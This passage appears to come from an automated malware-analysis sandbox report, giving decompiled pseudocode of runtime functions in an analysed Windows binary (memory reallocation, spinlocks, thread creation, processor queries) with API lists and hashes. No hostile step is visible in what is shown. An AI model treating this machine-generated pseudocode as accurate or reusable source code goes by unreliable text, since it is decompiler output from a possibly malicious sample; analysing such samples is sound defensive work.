                                                            											__eflags = _t195 - 0xb30;
                                                            											if(_t195 >= 0xb30) {
                                                            												__eflags = _t123 + _t217;
                                                            												E00403B00(_t123 + _t217, _t171, _t195);
                                                            											}
                                                            										} else {
                                                            											 *(_t217 + _t232) =  *(_t217 + _t232) & 0xfffffff7;
                                                            											_t233 = _t232 + 4;
                                                            										}
                                                            										_t234 = _t233 | _t156;
                                                            										__eflags = _t234;
                                                            										 *(_t217 - 4) = _t234;
                                                            										 *0x4bbae8 = 0;
                                                            										_t109 = _t217;
                                                            										L73:
                                                            										return _t109;
                                                            									} else {
                                                            										while(1) {
                                                            											asm("lock cmpxchg [0x4bbae8], ah");
                                                            											if(__eflags == 0) {
                                                            												break;
                                                            											}
                                                            											asm("pause");
                                                            											__eflags =  *0x4bb989;
                                                            											if(__eflags != 0) {
                                                            												continue;
                                                            											} else {
                                                            												Sleep(0);
                                                            												_t176 = _t176;
                                                            												_t171 = _t171;
                                                            												asm("lock cmpxchg [0x4bbae8], ah");
                                                            												if(__eflags != 0) {
                                                            													Sleep(0xa);
                                                            													_t176 = _t176;
                                                            													_t171 = _t171;
                                                            													continue;
                                                            												}
                                                            											}
                                                            											break;
                                                            										}
                                                            										_t156 = 0x0000000f &  *(_t217 - 4);
                                                            										_t129 =  *(_t205 - 4);
                                                            										__eflags = _t129 & 0x00000001;
                                                            										if((_t129 & 0x00000001) == 0) {
                                                            											L74:
                                                            											 *0x4bbae8 = 0;
                                                            											goto L75;
                                                            										} else {
                                                            											_t115 = _t129 & 0xfffffff0;
                                                            											_t232 = _t171 + _t115;
                                                            											__eflags = _t176 - _t232;
                                                            											if(_t176 > _t232) {
                                                            												goto L74;
                                                            											} else {
                                                            												goto L66;
                                                            											}
                                                            										}
                                                            									}
                                                            								}
                                                            							}
                                                            						} else {
                                                            							__eflags = __edx + __edx - _t171;
                                                            							if(__edx + __edx < _t171) {
                                                            								__eflags = __edx - 0xb2c;
                                                            								if(__edx >= 0xb2c) {
                                                            									L41:
                                                            									_t32 = _t176 + 0xd3; // 0xbff
                                                            									_t238 = (_t32 & 0xffffff00) + 0x30;
                                                            									_t174 = _t171 + 4 - _t238;
                                                            									__eflags =  *0x4bb059;
                                                            									if(__eflags != 0) {
                                                            										while(1) {
                                                            											asm("lock cmpxchg [0x4bbae8], ah");
                                                            											if(__eflags == 0) {
                                                            												break;
                                                            											}
                                                            											asm("pause");
                                                            											__eflags =  *0x4bb989;
                                                            											if(__eflags != 0) {
                                                            												continue;
                                                            											} else {
                                                            												Sleep(0);
                                                            												_t174 = _t174;
                                                            												asm("lock cmpxchg [0x4bbae8], ah");
                                                            												if(__eflags != 0) {
                                                            													Sleep(0xa);
                                                            													_t174 = _t174;
                                                            													continue;
                                                            												}
                                                            											}
                                                            											break;
                                                            										}
                                                            										_t156 = 0x0000000f &  *(_t217 - 4);
                                                            										__eflags = 0xf;
                                                            									}
                                                            									 *(_t217 - 4) = _t156 | _t238;
                                                            									_t161 = _t174;
                                                            									_t196 =  *(_t205 - 4);
                                                            									__eflags = _t196 & 0x00000001;
                                                            									if((_t196 & 0x00000001) != 0) {
                                                            										_t131 = _t205;
                                                            										_t197 = _t196 & 0xfffffff0;
                                                            										_t161 = _t161 + _t197;
                                                            										_t205 = _t205 + _t197;
                                                            										__eflags = _t197 - 0xb30;
                                                            										if(_t197 >= 0xb30) {
                                                            											E00403AC0(_t131);
                                                            										}
                                                            									} else {
                                                            										 *(_t205 - 4) = _t196 | 0x00000008;
                                                            									}
                                                            									 *((intOrPtr*)(_t205 - 8)) = _t161;
                                                            									 *((intOrPtr*)(_t217 + _t238 - 4)) = _t161 + 3;
                                                            									__eflags = _t161 - 0xb30;
                                                            									if(_t161 >= 0xb30) {
                                                            										E00403B00(_t217 + _t238, _t174, _t161);
                                                            									}
                                                            									 *0x4bbae8 = 0;
                                                            									return _t217;
                                                            								} else {
                                                            									__eflags = __edx - 0x2cc;
                                                            									if(__edx < 0x2cc) {
                                                            										_t213 = __edx;
                                                            										_t140 = E00403EE8(__edx);
                                                            										__eflags = _t140;
                                                            										if(_t140 != 0) {
                                                            											_t241 = _t140;
                                                            											E00403AA4(_t217, _t213, _t140);
                                                            											E0040426C(_t217, _t213, _t241);
                                                            											_t140 = _t241;
                                                            										}
                                                            										return _t140;
                                                            									} else {
                                                            										_t176 = 0xb2c;
                                                            										__eflags = _t171 - 0xb2c;
                                                            										if(_t171 <= 0xb2c) {
                                                            											goto L37;
                                                            										} else {
                                                            											goto L41;
                                                            										}
                                                            									}
                                                            								}
                                                            							} else {
                                                            								L37:
                                                            								return _t66;
                                                            							}
                                                            						}
                                                            					}
                                                            				} else {
                                                            					__ebx =  *__ecx;
                                                            					__ecx =  *(__ebx + 2) & 0x0000ffff;
                                                            					__ecx = ( *(__ebx + 2) & 0x0000ffff) - 4;
                                                            					__eflags = __ecx - __edx;
                                                            					if(__ecx < __edx) {
                                                            						__ecx = __ecx + __ecx + 0x20;
                                                            						_push(__edi);
                                                            						__edi = __edx;
                                                            						__eax = 0;
                                                            						__ecx = __ecx - __edx;
                                                            						asm("adc eax, 0xffffffff");
                                                            						__eax = 0 & __ecx;
                                                            						__eax = (0 & __ecx) + __edx;
                                                            						__eax = E00403EE8((0 & __ecx) + __edx);
                                                            						__eflags = __eax;
                                                            						if(__eax != 0) {
                                                            							__eflags = __edi - 0x40a2c;
                                                            							if(__edi > 0x40a2c) {
                                                            								 *(__eax - 8) = __edi;
                                                            							}
                                                            							 *(__ebx + 2) & 0x0000ffff = ( *(__ebx + 2) & 0x0000ffff) - 4;
                                                            							__eflags = ( *(__ebx + 2) & 0x0000ffff) - 4;
                                                            							__edx = __eax;
                                                            							__edi = __eax;
                                                            							 *((intOrPtr*)(__ebx + 0x1c))() = E0040426C(__esi, __edi, __ebp);
                                                            							__eax = __edi;
                                                            						}
                                                            						_pop(__edi);
                                                            						_pop(__esi);
                                                            						_pop(__ebx);
                                                            						return __eax;
                                                            					} else {
                                                            						__ebx = 0x40 + __edx * 4;
                                                            						__eflags = 0x40 + __edx * 4 - __ecx;
                                                            						if(0x40 + __edx * 4 < __ecx) {
                                                            							__ebx = __edx;
                                                            							__eax = __edx;
                                                            							__eax = E00403EE8(__edx);
                                                            							__eflags = __eax;
                                                            							if(__eax != 0) {
                                                            								__ecx = __ebx;
                                                            								__edx = __eax;
                                                            								__ebx = __eax;
                                                            								__esi = E0040426C(__esi, __edi, __ebp);
                                                            								__eax = __ebx;
                                                            							}
                                                            							_pop(__esi);
                                                            							_pop(__ebx);
                                                            							return __eax;
                                                            						} else {
                                                            							_pop(__esi);
                                                            							_pop(__ebx);
                                                            							return __eax;
                                                            						}
                                                            					}
                                                            				}
                                                            			}












































                                                            0x0040465f
                                                            0x00404666
                                                            0x00000000
                                                            0x00404668
                                                            0x0040466c
                                                            0x00404671
                                                            0x00404672
                                                            0x00404678
                                                            0x00404680
                                                            0x00404686
                                                            0x0040468b
                                                            0x0040468c
                                                            0x00000000
                                                            0x0040468c
                                                            0x00404680
                                                            0x00000000
                                                            0x00404666
                                                            0x00404695
                                                            0x00404698
                                                            0x0040469b
                                                            0x0040469d
                                                            0x0040471d
                                                            0x0040471d
                                                            0x00000000
                                                            0x0040469f
                                                            0x0040469f
                                                            0x004046a2
                                                            0x004046a5
                                                            0x004046a7
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004046a7
                                                            0x0040469d
                                                            0x0040464c
                                                            0x0040463f
                                                            0x0040451d
                                                            0x00404520
                                                            0x00404522
                                                            0x0040452c
                                                            0x00404532
                                                            0x00404549
                                                            0x00404549
                                                            0x00404555
                                                            0x0040455b
                                                            0x0040455d
                                                            0x00404564
                                                            0x00404566
                                                            0x0040456b
                                                            0x00404573
                                                            0x00000000
                                                            0x00000000
                                                            0x00404575
                                                            0x00404577
                                                            0x0040457e
                                                            0x00000000
                                                            0x00404580
                                                            0x00404583
                                                            0x00404588
                                                            0x0040458e
                                                            0x00404596
                                                            0x0040459b
                                                            0x004045a0
                                                            0x00000000
                                                            0x004045a0
                                                            0x00404596
                                                            0x00000000
                                                            0x0040457e
                                                            0x004045a9
                                                            0x004045a9
                                                            0x004045a9
                                                            0x004045ae
                                                            0x004045b1
                                                            0x004045b3
                                                            0x004045b6
                                                            0x004045b9
                                                            0x004045c4
                                                            0x004045c6
                                                            0x004045c9
                                                            0x004045cb
                                                            0x004045cd
                                                            0x004045d3
                                                            0x004045d5
                                                            0x004045d5
                                                            0x004045bb
                                                            0x004045be
                                                            0x004045be
                                                            0x004045da
                                                            0x004045e0
                                                            0x004045e4
                                                            0x004045ea
                                                            0x004045f1
                                                            0x004045f1
                                                            0x004045f6
                                                            0x00404603
                                                            0x00404534
                                                            0x00404534
                                                            0x0040453a
                                                            0x00404604
                                                            0x00404608
                                                            0x0040460d
                                                            0x0040460f
                                                            0x00404611
                                                            0x00404619
                                                            0x00404620
                                                            0x00404625
                                                            0x00404625
                                                            0x0040462b
                                                            0x00404540
                                                            0x00404540
                                                            0x00404545
                                                            0x00404547
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00404547
                                                            0x0040453a
                                                            0x00404524
                                                            0x00404524
                                                            0x00404528
                                                            0x00404528
                                                            0x00404522
                                                            0x00404517
                                                            0x00404474
                                                            0x00404474
                                                            0x00404476
                                                            0x0040447a
                                                            0x0040447d
                                                            0x0040447f
                                                            0x004044b8
                                                            0x004044bc
                                                            0x004044bd
                                                            0x004044bf
                                                            0x004044c1
                                                            0x004044c3
                                                            0x004044c6
                                                            0x004044c8
                                                            0x004044ca
                                                            0x004044cf
                                                            0x004044d1
                                                            0x004044d3
                                                            0x004044d9
                                                            0x004044db
                                                            0x004044db
                                                            0x004044e2
                                                            0x004044e2
                                                            0x004044e5
                                                            0x004044e7
                                                            0x004044f0
                                                            0x004044f5
                                                            0x004044f5
                                                            0x004044f7
                                                            0x004044f8
                                                            0x004044f9
                                                            0x004044fa
                                                            0x00404481
                                                            0x00404481
                                                            0x00404488
                                                            0x0040448a
                                                            0x00404490
                                                            0x00404492
                                                            0x00404494
                                                            0x00404499
                                                            0x0040449b
                                                            0x0040449d
                                                            0x0040449f
                                                            0x004044a1
                                                            0x004044ac
                                                            0x004044b1
                                                            0x004044b1
                                                            0x004044b3
                                                            0x004044b4
                                                            0x004044b5
                                                            0x0040448c
                                                            0x0040448c
                                                            0x0040448d
                                                            0x0040448e
                                                            0x0040448e
                                                            0x0040448a
                                                            0x0040447f

                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ec1625ffc2fe51f8c31513aba64e24c59fd6eccf0fed4d7fd9cb209259156b9f
                                                            • Instruction ID: a6f3f7862a5743fd60f07ae337b35688b7a953487e66f12862dc3ba09d14b1d9
                                                            • Opcode Fuzzy Hash: ec1625ffc2fe51f8c31513aba64e24c59fd6eccf0fed4d7fd9cb209259156b9f
                                                            • Instruction Fuzzy Hash: 8CC115A27106000BD714AE7DDD8476AB68A9BC5716F28827FF244EB3D6DB7CCD418388
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 68%
                                                            			E0041F7A0(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
                                                            				char _v8;
                                                            				struct _MEMORY_BASIC_INFORMATION _v36;
                                                            				short _v558;
                                                            				char _v564;
                                                            				intOrPtr _v568;
                                                            				char _v572;
                                                            				char _v576;
                                                            				char _v580;
                                                            				intOrPtr _v584;
                                                            				char _v588;
                                                            				void* _v592;
                                                            				char _v596;
                                                            				char _v600;
                                                            				char _v604;
                                                            				char _v608;
                                                            				intOrPtr _v612;
                                                            				char _v616;
                                                            				char _v620;
                                                            				char _v624;
                                                            				void* _v628;
                                                            				char _v632;
                                                            				void* _t64;
                                                            				intOrPtr _t65;
                                                            				long _t76;
                                                            				intOrPtr _t82;
                                                            				intOrPtr _t103;
                                                            				intOrPtr _t107;
                                                            				intOrPtr _t110;
                                                            				intOrPtr _t112;
                                                            				intOrPtr _t115;
                                                            				intOrPtr _t127;
                                                            				void* _t136;
                                                            				intOrPtr _t138;
                                                            				void* _t141;
                                                            				void* _t143;
                                                            
                                                            				_t136 = __edi;
                                                            				_t140 = _t141;
                                                            				_v632 = 0;
                                                            				_v596 = 0;
                                                            				_v604 = 0;
                                                            				_v600 = 0;
                                                            				_v8 = 0;
                                                            				_push(_t141);
                                                            				_push(0x41f9a6);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t141 + 0xfffffd8c;
                                                            				_t64 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x14)) - 1;
                                                            				_t143 = _t64;
                                                            				if(_t143 < 0) {
                                                            					_t65 =  *0x4ba798; // 0x40e730
                                                            					E0040C9F0(_t65,  &_v8, _t140);
                                                            				} else {
                                                            					if(_t143 == 0) {
                                                            						_t107 =  *0x4ba670; // 0x40e738
                                                            						E0040C9F0(_t107,  &_v8, _t140);
                                                            					} else {
                                                            						if(_t64 == 7) {
                                                            							_t110 =  *0x4ba4d0; // 0x40e740
                                                            							E0040C9F0(_t110,  &_v8, _t140);
                                                            						} else {
                                                            							_t112 =  *0x4ba5c8; // 0x40e748
                                                            							E0040C9F0(_t112,  &_v8, _t140);
                                                            						}
                                                            					}
                                                            				}
                                                            				_t115 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x18));
                                                            				VirtualQuery( *( *((intOrPtr*)(_a4 - 4)) + 0xc),  &_v36, 0x1c);
                                                            				_t138 = _v36.State;
                                                            				if(_t138 == 0x1000 || _t138 == 0x10000) {
                                                            					_t76 = GetModuleFileNameW(_v36.AllocationBase,  &_v558, 0x105);
                                                            					_t147 = _t76;
                                                            					if(_t76 == 0) {
                                                            						goto L12;
                                                            					} else {
                                                            						_v592 =  *( *((intOrPtr*)(_a4 - 4)) + 0xc);
                                                            						_v588 = 5;
                                                            						E0040858C( &_v600, 0x105,  &_v558);
                                                            						E0041A418(_v600, _t115,  &_v596, _t136, _t138, _t147);
                                                            						_v584 = _v596;
                                                            						_v580 = 0x11;
                                                            						_v576 = _v8;
                                                            						_v572 = 0x11;
                                                            						_v568 = _t115;
                                                            						_v564 = 5;
                                                            						_push( &_v592);
                                                            						_t103 =  *0x4ba6e0; // 0x40e810
                                                            						E0040C9F0(_t103,  &_v604, _t140, 3);
                                                            						E0041F2A0(_t115, _v604, 1, _t136, _t138);
                                                            					}
                                                            				} else {
                                                            					L12:
                                                            					_v628 =  *( *((intOrPtr*)(_a4 - 4)) + 0xc);
                                                            					_v624 = 5;
                                                            					_v620 = _v8;
                                                            					_v616 = 0x11;
                                                            					_v612 = _t115;
                                                            					_v608 = 5;
                                                            					_push( &_v628);
                                                            					_t82 =  *0x4ba67c; // 0x40e6d8
                                                            					E0040C9F0(_t82,  &_v632, _t140, 2);
                                                            					E0041F2A0(_t115, _v632, 1, _t136, _t138);
                                                            				}
                                                            				_pop(_t127);
                                                            				 *[fs:eax] = _t127;
                                                            				_push(0x41f9ad);
                                                            				E00407A20( &_v632);
                                                            				E00407A80( &_v604, 3);
                                                            				return E00407A20( &_v8);
                                                            			}


                                                            APIs
                                                            • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0041F9A6), ref: 0041F840
                                                            • GetModuleFileNameW.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0041F9A6), ref: 0041F86C
                                                              • Part of subcall function 0040C9F0: LoadStringW.USER32(00000000,00010000,?,00001000), ref: 0040CA35
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: FileLoadModuleNameQueryStringVirtual
                                                            • String ID: 0@$8@$@@$H@
                                                            • API String ID: 902310565-4161625419
                                                            • Opcode ID: 2bcb5d97eafe9ae16bdb5e5d20f221eb3d58e794d65a866e62d276be447e8c2a
                                                            • Instruction ID: bbc3c026f35d1d6bea3ad9012fddeafd4c483e803022796d8e8ef386e34d3195
                                                            • Opcode Fuzzy Hash: 2bcb5d97eafe9ae16bdb5e5d20f221eb3d58e794d65a866e62d276be447e8c2a
                                                            • Instruction Fuzzy Hash: 69511874A04258DFCB10EF69CC89BCDB7F4AB48304F0042E6A808A7351D778AE85CF59
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 88%
                                                            			E00406688(signed char* __eax, void* __edx, void* __eflags) {
                                                            				void* _t49;
                                                            				signed char _t56;
                                                            				intOrPtr _t57;
                                                            				signed char _t59;
                                                            				void* _t70;
                                                            				signed char* _t71;
                                                            				intOrPtr _t72;
                                                            				signed char* _t73;
                                                            
                                                            				_t70 = __edx;
                                                            				_t71 = __eax;
                                                            				_t72 =  *((intOrPtr*)(__eax + 0x10));
                                                            				while(1) {
                                                            					L1:
                                                            					 *_t73 = E00406B30(_t71);
                                                            					if( *_t73 != 0 || _t70 == 0) {
                                                            						break;
                                                            					}
                                                            					_t73[1] = 0;
                                                            					if(_t72 <= 0) {
                                                            						while(1) {
                                                            							L17:
                                                            							_t56 =  *_t71;
                                                            							if(_t56 == 0) {
                                                            								goto L1;
                                                            							}
                                                            							asm("lock cmpxchg [esi], edx");
                                                            							if(_t56 != _t56) {
                                                            								continue;
                                                            							} else {
                                                            								goto L19;
                                                            							}
                                                            							do {
                                                            								L19:
                                                            								_t73[4] = GetTickCount();
                                                            								E0040688C(_t71);
                                                            								_t57 =  *0x4bb8f8; // 0x4b9284
                                                            								 *((intOrPtr*)(_t57 + 0x10))();
                                                            								 *_t73 = 0 == 0;
                                                            								if(_t70 != 0xffffffff) {
                                                            									_t73[8] = GetTickCount();
                                                            									if(_t70 <= _t73[8] - _t73[4]) {
                                                            										_t70 = 0;
                                                            									} else {
                                                            										_t70 = _t70 - _t73[8] - _t73[4];
                                                            									}
                                                            								}
                                                            								if( *_t73 == 0) {
                                                            									do {
                                                            										asm("lock cmpxchg [esi], edx");
                                                            									} while ( *_t71 !=  *_t71);
                                                            									_t73[1] = 1;
                                                            								} else {
                                                            									while(1) {
                                                            										_t59 =  *_t71;
                                                            										if((_t59 & 0x00000001) != 0) {
                                                            											goto L29;
                                                            										}
                                                            										asm("lock cmpxchg [esi], edx");
                                                            										if(_t59 != _t59) {
                                                            											continue;
                                                            										}
                                                            										_t73[1] = 1;
                                                            										goto L29;
                                                            									}
                                                            								}
                                                            								L29:
                                                            							} while (_t73[1] == 0);
                                                            							if( *_t73 != 0) {
                                                            								_t71[8] = GetCurrentThreadId();
                                                            								_t71[4] = 1;
                                                            							}
                                                            							goto L32;
                                                            						}
                                                            						continue;
                                                            					}
                                                            					_t73[4] = GetTickCount();
                                                            					_t73[0xc] = 0;
                                                            					if(_t72 <= 0) {
                                                            						L13:
                                                            						if(_t70 == 0xffffffff) {
                                                            							goto L17;
                                                            						}
                                                            						_t73[8] = GetTickCount();
                                                            						_t49 = _t73[8] - _t73[4];
                                                            						if(_t70 > _t49) {
                                                            							_t70 = _t70 - _t49;
                                                            							goto L17;
                                                            						}
                                                            						 *_t73 = 0;
                                                            						break;
                                                            					}
                                                            					L5:
                                                            					L5:
                                                            					if(_t70 == 0xffffffff || _t70 > GetTickCount() - _t73[4]) {
                                                            						goto L8;
                                                            					} else {
                                                            						 *_t73 = 0;
                                                            					}
                                                            					break;
                                                            					L8:
                                                            					if( *_t71 > 1) {
                                                            						goto L13;
                                                            					}
                                                            					if( *_t71 != 0) {
                                                            						L12:
                                                            						E00406368( &(_t73[0xc]));
                                                            						_t72 = _t72 - 1;
                                                            						if(_t72 > 0) {
                                                            							goto L5;
                                                            						}
                                                            						goto L13;
                                                            					}
                                                            					asm("lock cmpxchg [esi], edx");
                                                            					if(0 != 0) {
                                                            						goto L12;
                                                            					}
                                                            					_t71[8] = GetCurrentThreadId();
                                                            					_t71[4] = 1;
                                                            					 *_t73 = 1;
                                                            					break;
                                                            				}
                                                            				L32:
                                                            				return  *_t73 & 0x000000ff;
                                                            			}












                                                            APIs
                                                              • Part of subcall function 00406B30: GetCurrentThreadId.KERNEL32 ref: 00406B33
                                                            • GetTickCount.KERNEL32 ref: 004066BF
                                                            • GetTickCount.KERNEL32 ref: 004066D7
                                                            • GetCurrentThreadId.KERNEL32 ref: 00406706
                                                            • GetTickCount.KERNEL32 ref: 00406731
                                                            • GetTickCount.KERNEL32 ref: 00406768
                                                            • GetTickCount.KERNEL32 ref: 00406792
                                                            • GetCurrentThreadId.KERNEL32 ref: 00406802
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: CountTick$CurrentThread
                                                            • String ID:
                                                            • API String ID: 3968769311-0
                                                            • Opcode ID: d68569389b1874426944dbdaf855cb9de5dde29c2ee803ff208aff5c928e2b2c
                                                            • Instruction ID: 4198438d609b3d92ee1caba3903e9c970ac06421e97b93dd9799f90313ce3de1
                                                            • Opcode Fuzzy Hash: d68569389b1874426944dbdaf855cb9de5dde29c2ee803ff208aff5c928e2b2c
                                                            • Instruction Fuzzy Hash: 664182712083419ED721AE3CC58431BBAD5AF80358F16C93ED4DA973C1EB7988958756
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 80%
                                                            			E004971AC(void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, intOrPtr _a4) {
                                                            				char _v5;
                                                            				char _v12;
                                                            				char _v16;
                                                            				char _v20;
                                                            				void* _t23;
                                                            				char _t29;
                                                            				void* _t50;
                                                            				intOrPtr _t55;
                                                            				char _t57;
                                                            				intOrPtr _t59;
                                                            				void* _t64;
                                                            				void* _t66;
                                                            				void* _t68;
                                                            				void* _t69;
                                                            				intOrPtr _t70;
                                                            
                                                            				_t64 = __edi;
                                                            				_t57 = __edx;
                                                            				_t50 = __ecx;
                                                            				_t68 = _t69;
                                                            				_t70 = _t69 + 0xfffffff0;
                                                            				_v20 = 0;
                                                            				if(__edx != 0) {
                                                            					_t70 = _t70 + 0xfffffff0;
                                                            					_t23 = E004062B0(_t23, _t68);
                                                            				}
                                                            				_t49 = _t50;
                                                            				_v5 = _t57;
                                                            				_t66 = _t23;
                                                            				_push(_t68);
                                                            				_push(0x4972a5);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t70;
                                                            				E00405CB8(0);
                                                            				_t3 = _t66 + 0x2c; // 0x266461
                                                            				 *(_t66 + 0xf) =  *_t3 & 0x000000ff ^ 0x00000001;
                                                            				if(_t50 == 0 ||  *(_t66 + 0x2c) != 0) {
                                                            					_t29 = 0;
                                                            				} else {
                                                            					_t29 = 1;
                                                            				}
                                                            				 *((char*)(_t66 + 0xd)) = _t29;
                                                            				if( *(_t66 + 0x2c) != 0) {
                                                            					 *((intOrPtr*)(_t66 + 8)) = GetCurrentThread();
                                                            					 *((intOrPtr*)(_t66 + 4)) = GetCurrentThreadId();
                                                            				} else {
                                                            					if(_a4 == 0) {
                                                            						_t12 = _t66 + 4; // 0x495548
                                                            						 *((intOrPtr*)(_t66 + 8)) = E004078E0(0, E004970B8, 0, _t12, 4, _t66);
                                                            					} else {
                                                            						_t9 = _t66 + 4; // 0x495548
                                                            						 *((intOrPtr*)(_t66 + 8)) = E004078E0(0, E004970B8, _a4, _t9, 0x10004, _t66);
                                                            					}
                                                            					if( *((intOrPtr*)(_t66 + 8)) == 0) {
                                                            						E0041DFB0(GetLastError(), _t49, 0, _t66);
                                                            						_v16 = _v20;
                                                            						_v12 = 0x11;
                                                            						_t55 =  *0x4ba740; // 0x40ea6c
                                                            						E0041F35C(_t49, _t55, 1, _t64, _t66, 0,  &_v16);
                                                            						E0040711C();
                                                            					}
                                                            				}
                                                            				_pop(_t59);
                                                            				 *[fs:eax] = _t59;
                                                            				_push(0x4972ac);
                                                            				return E00407A20( &_v20);
                                                            			}



















                                                            APIs
                                                            • GetLastError.KERNEL32(00000000,004972A5,?,00495544,00000000), ref: 00497247
                                                              • Part of subcall function 004078E0: CreateThread.KERNEL32 ref: 0040793A
                                                            • GetCurrentThread.KERNEL32 ref: 0049727F
                                                            • GetCurrentThreadId.KERNEL32 ref: 00497287
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: Thread$Current$CreateErrorLast
                                                            • String ID: 0@G$XtI$l@
                                                            • API String ID: 3539746228-385768319
                                                            • Opcode ID: a4dc03de5b91be95089a9569e035fcfb45136a4f5e23dfed5c7514759ebadc63
                                                            • Instruction ID: 1159262e71bebd7e921a745d602ab6fc0c684f98ff6f66721209a3575415716a
                                                            • Opcode Fuzzy Hash: a4dc03de5b91be95089a9569e035fcfb45136a4f5e23dfed5c7514759ebadc63
                                                            • Instruction Fuzzy Hash: 2B31E2309287449EDB10EBB68C427AB7FE49F09304F40C87EE455973C1DA3CA545C799
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 36%
                                                            			E00406424(void* __edx) {
                                                            				signed int _v8;
                                                            				intOrPtr _v12;
                                                            				char _v16;
                                                            				char* _t23;
                                                            				intOrPtr _t29;
                                                            				intOrPtr _t39;
                                                            				void* _t41;
                                                            				void* _t43;
                                                            				intOrPtr _t44;
                                                            
                                                            				_t41 = _t43;
                                                            				_t44 = _t43 + 0xfffffff4;
                                                            				_v16 = 0;
                                                            				if(GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetLogicalProcessorInformation") == 0) {
                                                            					L10:
                                                            					_v8 = 0x40;
                                                            					goto L11;
                                                            				} else {
                                                            					_t23 =  &_v16;
                                                            					_push(_t23);
                                                            					_push(0);
                                                            					L00403808();
                                                            					if(_t23 != 0 || GetLastError() != 0x7a) {
                                                            						goto L10;
                                                            					} else {
                                                            						_v12 = E004053F0(_v16);
                                                            						_push(_t41);
                                                            						_push(E004064D2);
                                                            						_push( *[fs:edx]);
                                                            						 *[fs:edx] = _t44;
                                                            						_push( &_v16);
                                                            						_push(_v12);
                                                            						L00403808();
                                                            						_t29 = _v12;
                                                            						if(_v16 <= 0) {
                                                            							L8:
                                                            							_pop(_t39);
                                                            							 *[fs:eax] = _t39;
                                                            							_push(E004064D9);
                                                            							return E0040540C(_v12);
                                                            						} else {
                                                            							while( *((short*)(_t29 + 4)) != 2 ||  *((char*)(_t29 + 8)) != 1) {
                                                            								_t29 = _t29 + 0x18;
                                                            								_v16 = _v16 - 0x18;
                                                            								if(_v16 > 0) {
                                                            									continue;
                                                            								} else {
                                                            									goto L8;
                                                            								}
                                                            								goto L12;
                                                            							}
                                                            							_v8 =  *(_t29 + 0xa) & 0x0000ffff;
                                                            							E00407210();
                                                            							L11:
                                                            							return _v8;
                                                            						}
                                                            					}
                                                            				}
                                                            				L12:
                                                            			}













                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformation), ref: 00406439
                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040643F
                                                            • GetLastError.KERNEL32(00000000,?,GetLogicalProcessorInformation), ref: 0040645B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: AddressErrorHandleLastModuleProc
